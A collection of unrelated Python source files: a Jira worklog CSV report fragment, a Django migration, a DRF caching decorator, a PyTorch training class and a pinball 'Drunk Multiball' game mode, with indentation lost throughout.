#this for loop compares the author that the main for loop is looking at against the the worker name in WorkerAndTS
for counter in range(len(WorkerAndTS)):
if str(author) == str(WorkerAndTS[counter][0]):
WorkerAndTS[counter][i+1] += time #if the author being looked at
# ties the issue to the time spent on the issue by each other
for i in range(len(fullissuelist)):
for j in range(len(WorkerAndTS)):
fullissuelist[i].append(WorkerAndTS[j][i+1])
# This list will only hold issues that have times logged on them, this for loop appends the issues which contain issues that don't have all zeros
currentlist = []
for i in range(len(fullissuelist)):
zeros = 0 # tally of the amount of zeros in an issue
for j in range(len(fullissuelist[i])):
if fullissuelist[i][j] == 0:
zeros += 1 # adds 1 to the tally when a 0 is found
# compared the amount of zeros to the number of items in the nested list which contains the issue
if zeros < (len(fullissuelist[i])-1): # since the fullissuelist will only contain the issue summary right now, we only need to detect whether the amount of zeros is equivalent to the length of list without the summary
currentlist.append(fullissuelist[i]) # if the amount of zeros is less than the length of the list without the summary, this means a worker has logged time on the issue, this means the issue will get appended to the currentlist
# aesthetic purposes, replaces the 0s in each nested list in currentlist with blank spaces
for i in range(len(currentlist)):
for j in range(len(currentlist[i])):
if currentlist[i][j] == 0:
currentlist[i][j] = ""
# obtains the length of each nested list in currentlist, this will be used when appending time
length_list = []
for i in range(len(currentlist)):
length_list.append(len(currentlist[i]))
# appends the time created and time resolved into the currentlist
for i in range(len(all_issues)):
issue = jira.issue(all_issues[i])
for i in range(len(currentlist)):
if len(currentlist[i]) == length_list[i]: # this checks whether the length of the nested list is equal to the length of the list before the created time and resolve time were added
# this is used in case some of the issues have the same names but different creation dates and resolve dates
if currentlist[i][0] == issue.fields.summary:# checks to see if the summary in the nested list is the same as the one being looked at by the main loop
# this section obtains the date the issue was created and puts it into a traditional day/month/year format
date = "{}".format(issue.fields.created)
date_obj = datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%f%z')
year = date_obj.strftime("%Y")
month = date_obj.strftime("%m")
day = date_obj.strftime("%d")
timestring = (day+"/"+month+"/"+year)
currentlist[i].insert(1, timestring)
# this section similar to the creation date formatting, it finds the date of when an issue was resolved
if issue.fields.resolutiondate:
date = "{}".format(issue.fields.resolutiondate)
date_obj = datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%f%z')
year = date_obj.strftime("%Y")
month = date_obj.strftime("%m")
day = date_obj.strftime("%d")
timestring = (day+"/"+month+"/"+year)
currentlist[i].insert(2, timestring)
# as some issue have not been resolved, they won't have a resolved date, in which case their resolved date will be marked as 'none' in the csv file
else:
currentlist[i].insert(2, "none")
# inserts the issue key into the nested list which contains the corresponding issue by matching it with the summary
for i in range(len(all_issues)):
issue = jira.issue(all_issues[i])
summary = issue.fields.summary
for j in range(len(currentlist)):
if summary == currentlist[j][0]:
currentlist[j].insert(0, issue.key)
# inserts the project name into the nested lists
for i in range(len(currentlist)):
currentlist[i].insert(0, projectname)
# creates a new list which will be used to rearrange the 2D list so it can written to the csv file in the given format
# csv format is | Projectid | issueid | issue_desc | CreateDate | ResDate | all worker names with their own cell |
# this for loop adds the project names, the creation date and the resolve date to the new_currentlist
new_current = []
for i in range(len(currentlist)):
new_current.append([currentlist[i][0]])
for j in range(4):
new_current[i].append(currentlist[i][j+1])
# this for loop appends the number 0 for the amount of workers in all_worker_names. This 0 represents the amount of time a worker has worked on the each project in the issues in new_currentlist
for i in range(len(new_current)):
for j in range(len(all_worker_names)):
new_current[i].append(0)
# this for loops connects the location of the worker in the worker name list with a 0 in the new_currentlist
for i in range(len(all_issues)):
issue = jira.issue(all_issues[i])
worklogs = jira.worklogs(issue.key)
for worklog in worklogs:
author = worklog.author
time = worklog.timeSpentSeconds
for j in range(len(all_worker_names)):
if str(author) == all_worker_names[j]:
# it obtains the index location of the worker in all_worker_names and then adds the amount of time they logged to the 0 which matches the index inside the new_currentlist
for counter in range(len(new_current)):
if new_current[counter][2] == issue.fields.summary:
new_current[counter][j+5] += time # I add 5 to avoid any of the list items before the 0s
# aesthetic purposes, replaces the 0s in each nested list inside new_currentlist with blank spaces
for i in range(len(new_current)):
for j in range(len(new_current[i])):
if new_current[i][j] == 0:
new_current[i][j] = ""
# if the current project is the first project being written to the csv file, write the headers into the file
# csv header will only contain the names of the workers at this point, so this section adds the rest of the headers into that list
if projectcount == 0:
csv_header.insert(0, 'Resdate')
csv_header.insert(0, 'Createdate')
csv_header.insert(0, 'issue_desc')
csv_header.insert(0, 'issueid')
csv_header.insert(0, 'Projectid')
with open ('test3.csv', mode='a', encoding='utf-8') as file: # encoding is used to write characters that the ascii codec cannot encode
writer = csv.writer(file, delimiter=",", quoting=csv.QUOTE_ALL)
if projectcount == 0:
writer.writerow(csv_header)
for i in range(len(new_current)):
writer.writerow((new_current[i])) # writes thew new_currentlist which contains the project id, issue id, issue summary. creation date, resolution date and the workers names in that order
print(projectname, "has been loaded into the file")
projectcount += 1 # adds 1 to the project counter to say that the first project has been full loaded, this is to avoid the header being written more than once
print('report is ready ^_^')
| StarcoderdataPython |
4831006 | # Generated by Django 2.1.7 on 2019-05-13 08:38
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('blog', '0017_auto_20190513_0836'),
]
operations = [
migrations.AlterField(
model_name='article',
name='unique_id',
field=models.CharField(default=uuid.UUID('dec364b0-ae38-462c-bacd-a395870ead80'), max_length=128, unique=True, verbose_name='唯一标识符'),
),
migrations.AlterField(
model_name='articlecol',
name='unique_id',
field=models.CharField(default=uuid.UUID('97a65b13-66d9-4454-8f35-fc42aeb158c2'), max_length=128, unique=True, verbose_name='唯一标识符'),
),
migrations.AlterField(
model_name='comment',
name='unique_id',
field=models.CharField(default=uuid.UUID('b2bad13e-02a6-4fd9-986c-fce08aa7ed8e'), max_length=128, unique=True, verbose_name='唯一标识符'),
),
migrations.AlterField(
model_name='reward',
name='unique_id',
field=models.CharField(default=uuid.UUID('cd72895a-550e-41d4-9e0f-e57dacff7db0'), max_length=128, unique=True, verbose_name='唯一标识符'),
),
migrations.AlterField(
model_name='tag',
name='unique_id',
field=models.CharField(default=uuid.UUID('0b63ecac-0fdf-4be7-8777-edc37588a45c'), max_length=128, unique=True, verbose_name='唯一标识符'),
),
migrations.AlterField(
model_name='type',
name='unique_id',
field=models.CharField(default='type_uuid=03a13896-3244-4c77-83ec-a5462bc802e5', max_length=128, unique=True, verbose_name='唯一标识符'),
),
]
| StarcoderdataPython |
1793754 | <gh_stars>0
import sub.p13
print('name:' + __name__)
# NoneType也属于False
print('package:' + (__package__ or 'no package'))
print('doc:' + (__doc__ or 'no doc'))
print('file:' + __file__)
# 被导入的模块
# name:sub.p13
# package:sub
# doc:
# this is sub.p13
# file:D:\SourceCode\python\zsq.LearningPython\class-py\sub\p13.py
# 执行的p6.py文件即为入口文件
# 入口文件的name为__main__,就像C#的入口main方法
# name:__main__
# 入口文件不属于任何包
# package:no package
# doc:no doc
# 入口文件的file不显示物理路径
# file:.\p6.py | StarcoderdataPython |
3245935 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import logging
# from django.utils.decorators import available_attrs
from functools import WRAPPER_ASSIGNMENTS, wraps
from django.core.cache import cache as dj_cache
from drf_cache.cache_helper import RedisCacheVersion
from drf_cache.cache_key import DefaultKeyGenerator
log = logging.getLogger("drf_cache")
class CacheRestApiResponse(object):
def __init__(self,
resource_name=None,
resource_type="L",
key_func=None,
cache=None,
timeout=None,
cache_errors=False,
follow_seed=True):
if timeout is None:
self.timeout = 600
else:
self.timeout = timeout
self.key_func = key_func or DefaultKeyGenerator()
if cache:
self.cache = cache
else:
self.cache = dj_cache
self.cache_errors = cache_errors
self.cache_helper = RedisCacheVersion()
self.resource_name = resource_name
self.resource_type = resource_type
self.follow_seed = follow_seed
def __call__(self, func):
this = self
@wraps(func, assigned=WRAPPER_ASSIGNMENTS)
def inner(self, request, *args, **kwargs):
return this.process_cache_response(
view_instance=self,
view_method=func,
request=request,
args=args,
kwargs=kwargs,
)
return inner
def process_cache_response(self,
view_instance,
view_method,
request,
args,
kwargs):
try:
# 获取key
key = self.calculate_key(
view_instance=view_instance,
view_method=view_method,
request=request,
args=args,
kwargs=kwargs)
if self.follow_seed:
# 版本判断
# 获取resource id
if "pk" in kwargs:
resource_id = kwargs["pk"]
else:
resource_id = None
cache_is_new = self.cache_helper.cache_is_new(key,
self.resource_name,
resource_id,
self.resource_type)
if cache_is_new:
# 缓存的是最新的,可以取缓存
log.debug("cache hit by key: %s" % key)
response = self.cache.get(key)
if not response:
response = self.render_response(request, view_instance, view_method, args, kwargs)
if not response.status_code >= 400 or self.cache_errors:
self.cache.set(key, response, self.timeout)
else:
log.debug("cache not hit: %s" % key)
response = self.render_response(request, view_instance, view_method, args, kwargs)
if not response.status_code >= 400 or self.cache_errors:
self.cache.set(key, response, self.timeout)
self.cache_helper.update_cache_version(key, self.resource_name, resource_id,
self.resource_type)
else:
# 直接缓存,不经过版本管理
response = self.cache.get(key)
if not response:
response = self.render_response(request, view_instance, view_method, args, kwargs)
if not response.status_code >= 400 or self.cache_errors:
self.cache.set(key, response, self.timeout)
except Exception as e:
log.exception(e)
response = self.render_response(request, view_instance, view_method, args, kwargs)
if not hasattr(response, "_closable_objects"):
response._closable_objects = []
return response
def render_response(self, request,
view_instance, view_method,
args, kwargs):
response = view_method(view_instance, request, *args, **kwargs)
response = view_instance.finalize_response(request, response, *args, **kwargs)
response.render()
return response
def calculate_key(self,
view_instance,
view_method,
request,
args,
kwargs):
"""
获取缓存的key
"""
cache_key = self.key_func(
view_instance=view_instance,
view_method=view_method,
request=request,
args=args,
kwargs=kwargs
)
return cache_key
class UpdateCacheSeedVersion(object):
def __init__(self,
resource_name=None,
resource_type="L", ):
self.cache_helper = RedisCacheVersion()
self.resource_name = resource_name
self.resource_type = resource_type
def __call__(self, func):
this = self
@wraps(func, assigned=WRAPPER_ASSIGNMENTS)
def inner(self, request, *args, **kwargs):
return this.update_cahce_version(
view_instance=self,
view_method=func,
request=request,
args=args,
kwargs=kwargs,
)
return inner
def update_cahce_version(self,
view_instance,
view_method,
request,
args,
kwargs):
"""
更新缓存的版本
"""
response = view_method(view_instance, request, *args, **kwargs)
if response:
if response.status_code == 201:
if "pk" in kwargs:
resource_id = kwargs["pk"]
else:
resource_id = None
self.cache_helper.update_seed_version(self.resource_name, resource_id, self.resource_type)
# 如果是单个对象,那么就要更新整个list
if resource_id:
self.cache_helper.update_seed_version(self.resource_name, None, "L")
# 如果是201 或者
return response
cache_rest_api_response = CacheRestApiResponse
update_seed_version = UpdateCacheSeedVersion
| StarcoderdataPython |
3363142 | <filename>Learner/cvx_learner.py
import time
import os
import sys
import torch
from torch import optim
from Learner.base_learner import BaseLearner
from CustomOptimizer.cvx import CVXOptimizer
class CVXLearner(BaseLearner):
def __init__(self, model, time_data,file_path, configs):
super(CVXLearner,self).__init__(model,time_data,file_path,configs)
if 'train_cvx' in configs['mode']:
reduction='none'
self.optimizer=CVXOptimizer(self.optimizer)
else:
raise NotImplementedError
self.criterion=self.criterion.__class__(reduction=reduction) # grad vector (no scalar)
if os.path.exists(os.path.join(self.making_path, time_data)) == False:
os.mkdir(os.path.join(self.making_path, time_data))
def run(self):
print("Training {} epochs".format(self.configs['epochs']))
best_accuracy=0.0
# Train
for epoch in range(1, self.configs['epochs'] + 1):
print('Learning rate: {}'.format(self.scheduler.optimizer.param_groups[0]['lr']))
train_metric = self._train(epoch)
eval_metric = self._eval()
self.scheduler.step()
loss_dict = {'train': train_metric['loss'], 'eval': eval_metric['loss']}
accuracy_dict = {'train': train_metric['accuracy'], 'eval': eval_metric['accuracy']}
self.logWriter.add_scalars('loss', loss_dict, epoch)
self.logWriter.add_scalars('accuracy', accuracy_dict, epoch)
best_accuracy=max(eval_metric['accuracy'],best_accuracy)
self.early_stopping(eval_metric['loss'], self.model)
if self.early_stopping.early_stop:
print("Early stopping")
break
if self.device == 'gpu':
torch.cuda.empty_cache()
print("Best Accuracy: "+str(best_accuracy))
self.configs['train_end_epoch']=epoch
configs = self.save_grad(epoch)
return configs
def _train(self, epoch):
tik = time.time()
self.model.train() # train모드로 설정
running_loss = 0.0
total_len_data=0
len_data=dict()
class_correct_dict=dict()
for i in range(self.configs['num_classes']):
class_correct_dict[i]=0
len_data[i]=0
current_len_data=0
total_len_data=len(self.train_loader.dataset)
for idx,(data,target) in enumerate(self.train_loader):
data, target = data.to(self.device), target.to(self.device) # gpu로 올림
output = self.model(data)
loss = self.criterion(output, target)
pred = output.argmax(dim=1, keepdim=True)
for class_idx in target.unique():
class_correct_dict[int(class_idx)]+=pred.eq(target.view_as(pred))[target==class_idx].sum().item()
len_data[int(class_idx)]+=(target==class_idx).sum()
running_loss+=loss.mean().item()
self.optimizer.zero_grad()
self.optimizer.cvx_backward(loss)
self.optimizer.step()
current_len_data+=target.size()[0]
if idx % self.log_interval == 0:
print('\r Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(epoch, current_len_data, total_len_data ,
100.0 * float(current_len_data) / float(total_len_data), loss.mean().item()), end='')
tok=time.time()
if self.configs['log_extraction']=='true':
sys.stdout.flush()
print("\n ============================\nTrain Learning Time:{:.2f}s \t Class Accuracy".format(tok-tik))
total_correct=0
for class_correct_key in class_correct_dict.keys():
class_accur=100.0*float(class_correct_dict[class_correct_key])/float(len_data[class_correct_key])
print('{} class :{}/{} {:2f}%'.format(class_correct_key,class_correct_dict[class_correct_key],len_data[class_correct_key],class_accur))
total_correct+=class_correct_dict[class_correct_key]
running_accuracy=100.0*float(total_correct)/float(total_len_data)
train_metric={'accuracy':running_accuracy,'loss': running_loss/float(total_len_data)}
print('{} epoch Total Accuracy: {:.2f}%, Total Loss: {}\n'.format(epoch,train_metric['accuracy'],train_metric['loss']))
return train_metric
def _eval(self):
self.model.eval()
eval_loss = 0
correct = 0
class_correct_dict=dict()
class_total_dict=dict()
for i in range(self.configs['num_classes']):
class_correct_dict[i]=0
class_total_dict[i]=0
with torch.no_grad():
for data, target in self.test_loader:
data, target = data.to(self.device), target.to(self.device)
output = self.model(data)
loss = self.criterion(output, target)
eval_loss += loss.mean().item()
# get the index of the max log-probability
pred = output.argmax(dim=1, keepdim=True)
for label in target.unique():
# print(label,pred.eq(target.view_as(pred))[target==label].sum().item())
class_correct_dict[int(label)]+=pred.eq(target.view_as(pred))[target==label].sum().item()
class_total_dict[int(label)]+=(target==label).sum().item()
eval_loss = eval_loss / len(self.test_loader.dataset)
correct=0
print("=================Eval=================")
for class_correct_key in class_correct_dict.keys():
correct+=class_correct_dict[class_correct_key]
class_accur=100.0*float(class_correct_dict[class_correct_key])/class_total_dict[class_correct_key]
print('{} class :{}/{} {:2f}%'.format(class_correct_key,class_correct_dict[class_correct_key],class_total_dict[class_correct_key],class_accur))
print('Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n==================='.format(
eval_loss, correct, len(self.test_loader.dataset),
100.0 * correct / float(len(self.test_loader.dataset))))
if self.configs['log_extraction']=='true':
sys.stdout.flush()
eval_accuracy = 100.0*correct/float(len(self.test_loader.dataset))
eval_metric={'accuracy':eval_accuracy,'loss': eval_loss}
return eval_metric
| StarcoderdataPython |
3381548 | ## ____ _ ____
## / ___|__ _ ___| |_ _ _ ___ / ___|__ _ _ __ _ _ ___ _ __
## | | / _` |/ __| __| | | / __| | | / _` | '_ \| | | |/ _ \| '_ \
## | |__| (_| | (__| |_| |_| \__ \ | |__| (_| | | | | |_| | (_) | | | |
## \____\__,_|\___|\__|\__,_|___/ \____\__,_|_| |_|\__, |\___/|_| |_|
## |___/
## ___ ___ _ _ _____ ___ _ _ _ _ ___ ___
## / __/ _ \| \| |_ _|_ _| \| | | | | __| \
## | (_| (_) | .` | | | | || .` | |_| | _|| |) |
## \___\___/|_|\_| |_| |___|_|\_|\___/|___|___/
##
## A P-ROC Project by <NAME>, Copyright 2012-2013
## Built on the PyProcGame Framework from <NAME> and <NAME>
## Original Cactus Canyon software by <NAME>
##
##
## The Drunk Multiball
##
## basic gist
## inverted flippers
## hitting the beer mug lights jackpots
## after collecting jackpots, or maybe after all 5 are lit, shooting the saloon should do something
from procgame import dmd,game
import ep
import random
class DrunkMultiball(ep.EP_Mode):
"""Drunk multiball mode ... """
def __init__(self,game,priority):
super(DrunkMultiball, self).__init__(game,priority)
self.myID = "Drunk Multiball"
anim = self.game.assets.dmd_dmbIdle
self.overlay = dmd.AnimatedLayer(frames=anim.frames,hold=False,opaque=False,repeat=True,frame_time=8)
self.shotModes = [self.game.lamp_control.left_loop,self.game.lamp_control.right_loop,self.game.lamp_control.left_ramp,self.game.lamp_control.center_ramp,self.game.lamp_control.right_ramp]
self.shots = ['leftLoopStage','leftRampStage','centerRampStage','rightLoopStage','rightRampStage']
self.availableJackpots = ['leftLoop','leftRamp','centerRamp','rightLoop','rightRamp']
# an animation for use in the intro
anim = self.game.assets.dmd_reverse
self.underLayer = dmd.AnimatedLayer(frames=anim.frames,hold=True,opaque=False,repeat=False)
self.starting = False
self.giOff = 'Disabled' == self.game.user_settings['Gameplay (Feature)']['Drunk Multiball GI']
self.enabled = 'Enabled' == self.game.user_settings['Gameplay (Feature)']['Drunk Multiball']
self.beerHit = False
self.active = []
self.downToOne = False
def mode_started(self):
if not self.enabled:
# Drunk multiball is disabled, do the bonus instead
self.drunk_bonus()
else:
# fire up the switch block if it's not already loaded
self.game.switch_blocker('add',self.myID)
# reset the jackpots
self.active = []
self.downToOne = False
self.jackpotValue = 2000000
self.jackpotIncrement = 100000
self.beerHit = False
self.jackpot_count = 0
def ball_drained(self):
# if we're dropping down to one ball, and drunk multiball is running - do stuff
if self.game.trough.num_balls_in_play == 1 and self.game.show_tracking('drunkMultiballStatus') == "RUNNING":
self.downToOne = True
self.end_save()
if self.game.trough.num_balls_in_play == 0 and self.game.show_tracking('drunkMultiballStatus') == "RUNNING":
# if we made it down to one ball before now, end normally - but if not, kick out a new ball
if not self.downToOne:
self.game.trough.launch_balls(1)
self.downToOne = True
self.end_save()
else:
self.game.base.busy = True
self.game.base.queued += 1
self.end_drunk()
### switches
def sw_leftLoopTop_active(self,sw):
self.process_shot('leftLoop',self.shotModes[0])
def sw_leftRampEnter_active(self, sw):
self.process_shot('leftRamp',self.shotModes[2])
def sw_centerRampMake_active(self, sw):
self.process_shot('centerRamp',self.shotModes[3])
def sw_rightLoopTop_active(self, sw):
if not self.game.bart.moving:
self.process_shot('rightLoop',self.shotModes[1])
def sw_rightRampMake_active(self, sw):
self.process_shot('rightRamp',self.shotModes[4])
def process_shot(self,shot,mode):
if shot in self.active:
self.collect_jackpot(shot,mode)
else:
self.game.score(2530)
# beer mug lights jackpots
def sw_beerMug_active(self,sw):
if self.beerHit:
pass
else:
self.beerHit = True
# delay to re-allow due to debounce being off
self.delay(delay=0.050,handler=self.beer_unhit)
self.game.score(27500)
# audit
self.game.game_data['Feature']['Drunk MB Beers'] += 1
if self.availableJackpots:
self.light_jackpot()
else:
pass
if not self.game.lamp_control.lights_out:
self.game.lamps.beerMug.schedule(0x00000CCC,cycle_seconds=1)
self.delay(delay=1,handler=self.flash_mug)
return game.SwitchStop
def beer_unhit(self):
self.beerHit = False
def flash_mug(self):
if not self.game.lamp_control.lights_out:
self.game.lamps.beerMug.schedule(0xFF00FF00)
# if it lands in the mine, just kick it out
def sw_minePopper_active_for_390ms(self,sw):
self.game.score(2530)
def start_drunk(self):
#print "STARTING DRUNK ASS MULTIBALL"
# audit
self.game.game_data['Feature']['Drunk MB Started'] += 1
self.running = True
# set the stack level
self.game.stack_level(3,True)
# update the tracking
self.game.set_tracking('drunkMultiballStatus', "RUNNING")
# disable the flippers
self.game.enable_flippers(False)
# enable the inverted flippers
self.game.enable_inverted_flippers(True)
# stop the music
#self.stop_music()
# turn the GI off - Based on setting
if self.giOff:
self.game.gi_control("OFF")
# update the lamps
self.lamp_update()
# play the drunk multiball song
self.music_on(self.game.assets.music_drunkMultiball)
# show some screens about the mode
self.banner()
def drunk_bonus(self):
#print "DMB Disabled, Drunk bonus"
# grab the point values
points = self.game.show_tracking('drunkBonusValue')
# show a screen
mug = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_beerMug1.frames[0])
mug.composite_op = "blacksrc"
words = ep.EP_TextLayer(51, 3, self.game.assets.font_9px_az, "center", opaque=False).set_text("DRUNK BONUS",color=ep.YELLOW)
score = ep.EP_TextLayer(51, 15, self.game.assets.font_9px_az, "center", opaque=False).set_text(ep.format_score(points),blink_frames=8,color=ep.GREEN)
combined = dmd.GroupedLayer(128,32,[words,score,mug])
self.layer = combined
self.game.sound.play(self.game.assets.sfx_pour)
# unload after 2 seconds
self.delay("Operational",delay=2,handler=self.unload)
# score some points
self.game.score(points)
# increase the text award
self.game.set_tracking('drunkBonusValue', (points + 100000))
# reset the mug hits for next time
self.game.set_tracking('beerMugHits',0)
# tick up the shots needed for next time
self.game.increase_tracking('mug_shots', self.game.user_settings['Gameplay (Feature)']['Beer Mug Hits Boost'])
# Eject the ball
self.game.saloon.kick()
# reset the DMB status
self.game.set_tracking('drunkMultiballStatus',"OPEN")
def banner(self):
# set a starting flag
self.starting = True
# setup the pour mask
# load up the animation
anim = self.game.assets.dmd_pourMask
# setup the animated layer
pour = ep.EP_AnimatedLayer(anim)
pour.hold=True
pour.frame_time = 6
pour.composite_op = "blacksrc"
mug = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_beerMug1.frames[0])
mug.composite_op = "blacksrc"
words = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_drunkMultiball.frames[0])
combined = dmd.GroupedLayer(128,32,[words,pour,mug])
self.layer = combined
self.game.sound.play(self.game.assets.sfx_pour)
self.delay("Operational",delay=1.3,handler=self.bannerTwo)
def bannerTwo(self):
self.game.base.play_quote(self.game.assets.quote_drunkDrinkToThat)
mug = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_beerMug1.frames[0])
mug.composite_op = "blacksrc"
words = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_drunkMultiball.frames[0])
combined = dmd.GroupedLayer(128,32,[words,mug])
self.layer = combined
self.delay("Operational",delay=1,handler=self.intro_display)
def intro_display(self,step=1):
## show some junk about how the mode works
if step == 1:
flippers = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_flippers1.frames[0])
arrow = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_flippers1.frames[0])
elif step == 2 or step == 4 or step == 6 or step == 8 or step == 10:
flippers = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_flippers2.frames[0])
arrowOne = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_rightArrow1.frames[0])
arrowTwo = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_rightArrow2.frames[0])
arrowThree = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_rightArrow3.frames[0])
arrow = dmd.ScriptedLayer(128,32,[{'seconds':0.15,'layer':arrowOne},{'seconds':0.15,'layer':arrowTwo},{'seconds':0.15,'layer':arrowThree}])
arrow.composite_op = "blacksrc"
elif step == 3 or step == 5 or step == 7 or step == 9:
flippers = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_flippers3.frames[0])
arrowOne = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_leftArrow1.frames[0])
arrowTwo = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_leftArrow2.frames[0])
arrowThree = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_leftArrow3.frames[0])
arrow = dmd.ScriptedLayer(128,32,[{'seconds':0.15,'layer':arrowOne},{'seconds':0.15,'layer':arrowTwo},{'seconds':0.15,'layer':arrowThree}])
arrow.composite_op = "blacksrc"
else:
# just to make the syntax checking happy
flippers = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_flippers1.frames[0])
arrow = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_flippers1.frames[0])
flippers.composite_op = "blacksrc"
text = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_reverse.frames[0])
if step == 2:
self.game.base.play_quote(self.game.assets.quote_drunkNeverSeen)
if step == 1:
combined = dmd.GroupedLayer(128,32,[text,flippers])
elif step == 2 or step == 3:
combined = dmd.GroupedLayer(128,32,[text,flippers,arrow])
else:
combined = dmd.GroupedLayer(128,32,[self.underLayer,flippers,arrow])
self.layer=combined
if step <= 5:
self.delay("Operational",delay=1,handler=self.intro_display,param=step+1)
else:
self.delay("Operational",delay=1,handler=self.get_going)
def abort_intro(self):
self.starting = False
self.cancel_delayed("Operational")
self.get_going()
def get_going(self):
self.starting = False
# turn off the saloon busy flag - should process check bounty and kick the ball out
self.game.saloon.busy = False
# flash the beer mug
self.flash_mug()
# eject more ball
if self.game.trough.num_balls_in_play < 3:
thisMany = 3 - self.game.trough.num_balls_in_play
self.game.trough.balls_to_autoplunge = thisMany
self.game.trough.launch_balls(thisMany)
# eject the ball in the saloon
self.game.saloon.kick()
# start a ball save
self.game.trough.start_ball_save(num_balls_to_save=3, time=20, now=True, allow_multiple_saves=True)
#self.delay(delay=2,handler=self.dmb_ball_save)
self.update_display()
def dmb_ball_save(self):
# start a ball save
self.game.trough.start_ball_save(num_balls_to_save=3, time=20, now=True, allow_multiple_saves=True)
def update_display(self):
self.overlay.composite_op = "blacksrc"
p = self.game.current_player()
scoreString = ep.format_score(p.score)
scoreLine = ep.EP_TextLayer(80, 8, self.game.assets.font_7px_az, "center", opaque=False).set_text(scoreString,blink_frames=8,color=ep.YELLOW)
textLine1 = ep.EP_TextLayer(80, 1, self.game.assets.font_5px_AZ, "center", opaque=False).set_text("DRUNK MULTIBALL",color=ep.ORANGE)
if self.active:
textLine2 = ep.EP_TextLayer(80, 18, self.game.assets.font_5px_AZ, "center", opaque=False).set_text("JACKPOTS",color=ep.BROWN)
textString = "WORTH " + str(ep.format_score(self.jackpotValue))
textLine3 = ep.EP_TextLayer(80, 25, self.game.assets.font_5px_AZ, "center", opaque=False).set_text(textString,color=ep.BROWN)
else:
textLine2 = ep.EP_TextLayer(80, 18, self.game.assets.font_5px_AZ, "center", opaque=False).set_text("HIT BEER MUG",color=ep.BROWN)
textLine3 = ep.EP_TextLayer(80, 25, self.game.assets.font_5px_AZ, "center", opaque=False).set_text("TO LIGHT JACKPOTS",color=ep.BROWN)
combined = dmd.GroupedLayer(128,32,[textLine1,textLine2,textLine3,scoreLine,self.overlay])
self.layer = combined
self.delay(name="Display",delay=0.2,handler=self.update_display)
def light_jackpot(self):
# pick a jackpot
thisOne = random.choice(self.availableJackpots)
# take it out of the available and make it active
self.availableJackpots.remove(thisOne)
self.active.append(thisOne)
#print self.active
# and update the lamps
self.lamp_update()
#print "LIGHTING JACKPOT"
anim = self.game.assets.dmd_dmb
animLayer = ep.EP_AnimatedLayer(anim)
animLayer.hold=True
animLayer.frame_time = 8
animLayer.composite_op = "blacksrc"
animLayer.add_frame_listener(3,self.game.sound.play,param=self.game.assets.sfx_ebDrink)
animLayer.add_frame_listener(5,self.game.sound.play,param=self.game.assets.sfx_ebDrink)
animLayer.opaque=False
words = self.game.assets.dmd_dmbJackpotAdded
myWait = (len(words.frames) / 10.0) + 1
wordsLayer = ep.EP_AnimatedLayer(words)
wordsLayer.add_frame_listener(6,self.game.sound.play,param=self.game.assets.sfx_orchestraSet)
wordsLayer.hold=True
wordsLayer.frame_time = 6
wordsLayer.opaque = True
combined = dmd.GroupedLayer(128,32,[wordsLayer,animLayer])
self.cancel_delayed("Display")
self.layer = combined
self.delay(name="Display",delay=myWait,handler=self.update_display)
def collect_jackpot(self,shot,mode):
# audit
self.game.game_data['Feature']['Drunk MB Jackpots'] += 1
# take it out of active and put it in available
# count the jackpots hit so far
self.jackpot_count += 1
self.active.remove(shot)
self.availableJackpots.append(shot)
# update the lamps for the hit ramp
mode('Disable')
self.cancel_delayed("GI Reset")
# flash some lights
self.game.lamps.gi01.schedule(0xFF00FF00,cycle_seconds=1)
self.game.lamps.gi02.schedule(0x0FF00FF0,cycle_seconds=1)
self.game.lamps.gi03.schedule(0x00FF00FF,cycle_seconds=1)
# turn the GI back on if not set for off
if not self.giOff:
self.delay("GI Reset",delay=1,handler=self.game.gi_control,param="ON")
# score some points
if self.jackpot_count == 5:
self.game.score((self.jackpotValue * 2))
else:
self.game.score(self.jackpotValue)
self.jackpotEarned = self.jackpotValue
self.jackpotValue += self.jackpotIncrement
# load up the animation
anim = self.game.assets.dmd_beerSlide
# setup the animated layer
beerLayer = ep.EP_AnimatedLayer(anim)
beerLayer.hold=True
beerLayer.frame_time = 3
beerLayer.composite_op = "blacksrc"
anim = self.game.assets.dmd_dmbJackpot
# setup the animated layer
wordsLayer = ep.EP_AnimatedLayer(anim)
wordsLayer.hold=True
wordsLayer.frame_time = 3
wordsLayer.composite_op = "blacksrc"
if self.layer == None:
self.layer = self.no_layer()
combined = dmd.GroupedLayer(128,32,[self.layer,wordsLayer,beerLayer])
self.cancel_delayed("Display")
self.layer = combined
self.game.sound.play(self.game.assets.sfx_slide)
if self.jackpot_count == 5 and not self.game.gm_multiball.running:
self.music_on(self.game.assets.music_fireball)
else:
self.game.base.play_quote(self.game.assets.quote_drunkJackpot)
self.delay(name="Display",delay=1.5,handler=self.jackpot_score)
def jackpot_score(self):
self.game.sound.play(self.game.assets.sfx_orchestraSpike)
scoreString = str(ep.format_score(self.jackpotEarned))
scoreLine = ep.EP_TextLayer(64, 8, self.game.assets.font_15px_az_outline, "center", opaque=False)
scoreLine.composite_op = "blacksrc"
scoreLine.set_text(scoreString,color=ep.YELLOW)
backdrop = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_dmbJackpot.frames[17])
combined = dmd.GroupedLayer(128,32,[backdrop,scoreLine])
self.layer = combined
self.delay(name="Display",delay=1,handler=self.update_display)
